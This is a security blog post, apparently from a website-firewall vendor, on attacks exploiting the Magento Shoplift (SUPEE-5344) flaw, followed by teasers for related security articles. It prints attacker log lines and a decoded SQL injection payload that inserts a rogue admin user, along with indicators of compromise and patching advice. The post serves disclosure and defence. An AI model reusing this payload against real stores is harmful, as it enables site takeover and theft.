Magento Shoplift (SUPEE-5344) Exploits in the Wild

As warned a few days ago, the Magento Shoplift (SUPEE-5344) vulnerability details have been disclosed by the CheckPoint team. They show step by step how it can be exploited to take over a vulnerable Magento site.

They have prepared the following video showing a Proof of Concept (PoC) in which they create a fake coupon:

That’s a simple example. This vulnerability can be exploited in much more devastating ways.

Magento ShopLift in the Wild

As expected, it is now actively being exploited.

In less than 24 hours since the disclosure, we have started to see attacks via our WAF logs trying to exploit this vulnerability. It seems to be coming from a specific crime group, since they all look the same:

62.76.177.179 – – [23/Apr/2015:00:45:44 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1″ 403 1880 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36″

185.22.232.218 – – [22/Apr/2015:00:42:38 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1″ 200 2211 “-” “Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0″

And always from these two IP addresses from Russia: 62.76.177.179 and 185.22.232.218. If you look for them in your logs, you can see if you have been attacked by the same group.

Our research team was able to catch and analyze their exploit. So far, it is only trying to create a fake admin user inside the Magento database. Which they will certainly misuse later to take over of the site. This is the decoded exploit:

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = “rp”;

SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –

The code is leveraging SQL Injection (SQLi) and inserting a new admin_user to the database. If you suspect you have been compromised, look for the usernames vpwq or defaultmanager as it seems to be the ones being used by this specific group so far.

Note that we are hiding some of the details and payloads, to make it hard for someone else to copy and create an exploit out of it. However, some groups already have an exploit and are attacking as many sites as they can, and pretty fast.

Protect your Magento site!

If you haven’t patched it yet, you are likely already compromised or will be soon. I recommend patching and adding your site behind A Web Application Firewall or Intrusion Detection System to stop these attacks for you.

If you’re in need of a solution, don’t hesitate to inquire about our Website Firewall; this vulnerability has been virtually patched for all existing customers.

Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins

Multiple WordPress Plugins are vulnerable to Cross-site Scripting (XSS) due to the misuse of the add_query_arg() and remove_query_arg() functions. These are popular functions used by developers to modify and add query strings to URLs within
Read More

Critical Magento Shoplift Vulnerability (SUPEE-5344) – Patch Immediately!

magento-security

The Magento team released a critical security patch (SUPEE-5344) to address a remote command execution (RCE) vulnerability back in February. It's been more than two months since the release and still more than 50% of all the Magento installations
Read More

Critical Microsoft IIS vulnerability Leads to RCE (MS15-034)

Microsoft just disclosed a serious vulnerability (MS15-034) on their Web Server IIS that allows for remote and unauthenticated Denial of Service (DoS) and/or Remote Code Execution (RCE) on unpatched Windows servers. An attacker only needs to send a
Read More

Impacts of a Hack on a Magento Ecommerce Website

cc-details

Recently we wrote about the impacts of a hacked website and how it is important to give website visitors a safe online experience In this post, I’ll show you how a hacked website results in almost immediate loss of money. We are not talking about d
Read More

How To Create a Website Backup Strategy

wire-rope-59675_640

We've all heard it million times before - backups are important. Still, the reality is that even today, backups remain one of the most overlooked and under-utilized precautions we can take to protect our vital data. Why are backups so
Read More

FBI Public Service Annoucement: Defacements Exploiting WordPress Vulnerabilities

ISIS-defacement

The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements
Read More

Security Advisory: Persistent XSS in WP-Super-Cache

WP Super Cache Details Key

Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability
Read More

Website Malware – The SWF iFrame Injector Evolves

VirusTotal Results for

Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with
Read More

Intro to E-Commerce and PCI Compliance – Part I

Sucuri-ecommerce-PCI-compliance

Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try
Read More